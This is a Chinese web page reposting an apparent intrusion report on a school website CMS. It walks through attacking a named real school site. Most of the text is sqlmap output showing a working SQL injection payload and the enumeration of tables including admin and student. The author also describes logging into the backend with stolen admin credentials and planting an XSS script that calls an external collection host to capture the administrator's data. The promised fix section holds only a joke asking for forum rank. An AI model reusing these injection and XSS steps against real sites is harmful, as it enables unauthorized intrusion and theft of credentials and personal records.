来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] 校无忧学校网站系统这个是关键字喔,可以加这个。也可以不加!百度搜索到好啦。。先这样子吧。。。都存在get注入?[root@Hacker~] Sqlmap sqlmap -u http: www tajx com TeacherView asp?id=12...
"校无忧学校网站系统" 这个是关键字喔,可以加""这个。也可以不加!百度搜索到
[root@Hacker~]# Sqlmap sqlmap -u "http://www.tajx.com/TeacherView.asp?id=12" sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 20:18:40 [20:18:40] [INFO] testing connection to the target url [20:18:41] [INFO] testing if the url is stable, wait a few seconds [20:18:43] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and pro vide a string or regular expression to match on how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] [20:18:46] [INFO] testing if GET parameter 'id' is dynamic [20:18:46] [INFO] confirming that GET parameter 'id' is dynamic [20:18:47] [WARNING] GET parameter 'id' appears to be not dynamic [20:18:47] [INFO] heuristics detected web page charset 'GB2312' [20:18:47] [WARNING] reflective value(s) found and filtering out [20:18:47] [INFO] heuristic test shows that GET parameter 'id' might be injectab le (possible DBMS: Microsoft Access) [20:18:47] [INFO] testing for SQL injection on GET parameter 'id' [20:18:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [20:18:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI NG clause' injectable parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] [20:18:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [20:18:52] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other potential injection technique found [20:19:22] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:19:33] [INFO] checking if the injection point on GET parameter 'id' is a fal se positive GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requ ests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=12 AND 5910=5910 --- [20:20:11] [INFO] testing Microsoft Access [20:20:12] [INFO] confirming Microsoft Access [20:20:13] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [20:20:13] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 30 times [20:20:13] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [20:20:13] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\??? ?\SQLMAP~3\Bin\output\www.tajx.com' [*] shutting down at 20:20:13
用阿D查看到了账号密码后进入后台。。准备进行深一步研究!然后在前台看见了个 写入XSS代码: <script src="http://xss.esotsec.org/?u=57a23e" > </script> 然后在后台点击查看 虽然显示空白 但是XSS测试平台已经收到信息了
[20:51:48] [INFO] tried 1184/3144 items (38%) [20:52:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:52:22] [INFO] tried 1201/3144 items (38%) [20:52:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:53:09] [INFO] retrieved: school [20:53:45] [INFO] tried 1268/3144 items (40%) [20:54:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:55:37] [INFO] tried 1365/3144 items (43%) [20:55:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:56:14] [INFO] tried 1383/3144 items (44%) [20:56:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:56:55] [INFO] tried 1403/3144 items (45%) [20:57:16] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:57:33] [INFO] tried 1426/3144 items (45%) [20:57:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:58:11] [INFO] tried 1461/3144 items (46%) [20:58:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:58:38] [INFO] tried 1469/3144 items (47%) [20:58:59] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [20:59:58] [INFO] tried 1541/3144 items (49%) [21:00:19] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:00:37] [INFO] tried 1566/3144 items (50%) [21:00:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:01:09] [INFO] tried 1570/3144 items (50%) [21:01:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:01:43] [INFO] tried 1587/3144 items (50%) [21:02:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:02:31] [INFO] tried 1629/3144 items (52%) [21:02:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:02:57] [INFO] tried 1639/3144 items (52%) [21:03:18] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:03:22] [INFO] tried 1648/3144 items (52%) [21:03:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:04:10] [INFO] tried 1690/3144 items (54%) [21:04:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:04:55] [INFO] tried 1729/3144 items (55%) [21:05:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:05:19] [INFO] tried 1736/3144 items (55%) [21:05:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:05:50] [INFO] tried 1755/3144 items (56%) [21:06:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:07:40] [INFO] tried 1836/3144 items (58%) [21:08:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:08:28] [INFO] tried 1879/3144 items (60%) [21:08:49] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:08:52] [INFO] tried 1882/3144 items (60%) [21:09:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:10:37] [INFO] tried 1962/3144 items (62%) [21:10:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:11:10] [INFO] tried 1984/3144 items (63%) [21:11:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:11:43] [INFO] tried 1997/3144 items (64%) [21:12:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:12:37] [INFO] tried 2032/3144 items (65%) [21:12:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:13:14] [INFO] tried 2050/3144 items (65%) [21:13:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:13:48] [INFO] tried 2067/3144 items (66%) [21:14:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:14:19] [INFO] tried 2084/3144 items (66%) [21:14:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:14:52] [INFO] tried 2098/3144 items (67%) [21:15:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:15:21] [INFO] tried 2121/3144 items (67%) [21:15:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:16:25] [INFO] tried 2157/3144 items (69%) [21:16:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:17:14] [INFO] tried 2189/3144 items (70%) [21:17:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:18:02] [INFO] tried 2198/3144 items (70%) [21:18:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:18:42] [INFO] tried 2223/3144 items (71%) [21:19:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:19:12] [INFO] tried 2237/3144 items (71%) [21:19:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:19:48] [INFO] tried 2262/3144 items (72%) [21:20:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:20:18] [INFO] tried 2277/3144 items (72%) [21:20:39] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:20:51] [INFO] tried 2301/3144 items (73%) [21:21:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:21:40] [INFO] tried 2334/3144 items (74%) [21:22:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:22:24] [INFO] tried 2363/3144 items (75%) [21:22:45] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:23:23] [INFO] tried 2404/3144 items (76%) [21:23:44] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:24:02] [INFO] tried 2435/3144 items (77%) [21:24:32] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request [21:24:50] [INFO] tried 2459/3144 items (78%) [21:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:25:33] [INFO] tried 2495/3144 items (79%) [21:25:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:26:07] [INFO] tried 2503/3144 items (80%) [21:26:28] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:26:58] [INFO] tried 2538/3144 items (81%) [21:27:19] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:27:42] [INFO] tried 2565/3144 items (82%) [21:28:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:28:23] [INFO] tried 2579/3144 items (82%) [21:28:44] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:29:14] [INFO] tried 2619/3144 items (83%) [21:29:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:30:05] [INFO] tried 2642/3144 items (84%) [21:30:26] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:30:37] [INFO] tried 2654/3144 items (84%) [21:30:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:31:04] [INFO] tried 2670/3144 items (85%) [21:31:25] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:31:51] [INFO] tried 2705/3144 items (86%) [21:32:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:32:41] [INFO] tried 2727/3144 items (87%) [21:33:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:33:09] [INFO] tried 2737/3144 items (87%) [21:33:30] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:33:40] [INFO] tried 2753/3144 items (88%) [21:34:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:34:19] [INFO] tried 2774/3144 items (88%) [21:34:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:35:02] [INFO] tried 2802/3144 items (89%) [21:35:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:35:34] [INFO] tried 2822/3144 items (90%) [21:36:04] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request [21:36:19] [INFO] tried 2845/3144 items (90%) [21:36:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:37:11] [INFO] tried 2869/3144 items (91%) [21:37:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:37:40] [INFO] tried 2891/3144 items (92%) [21:38:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:38:27] [INFO] tried 2920/3144 items (93%) [21:38:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:39:11] [INFO] tried 2950/3144 items (94%) [21:39:32] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:39:35] [INFO] tried 2955/3144 items (94%) [21:39:56] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:40:53] [INFO] tried 3006/3144 items (96%) [21:41:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:41:27] [INFO] tried 3025/3144 items (96%) [21:41:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:42:10] [INFO] tried 3050/3144 items (97%) [21:42:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:42:44] [INFO] tried 3059/3144 items (97%) [21:43:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:43:30] [INFO] tried 3104/3144 items (99%) [21:43:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [21:44:14] [INFO] tried 3133/3144 items (100%) [21:44:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request Database: Microsoft_Access_masterdb [6 tables] +----------+ | admin | | feedback | | menu | | news | | school | | student | +----------+ [21:44:46] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 3142 times [21:44:46] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\??? ?\SQLMAP~3\Bin\output\www.tajx.com' [*] shutting down at 21:44:46
修复方案:准备深一步研究哈!给我多点rank最好加精或来个证书。。哈哈 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com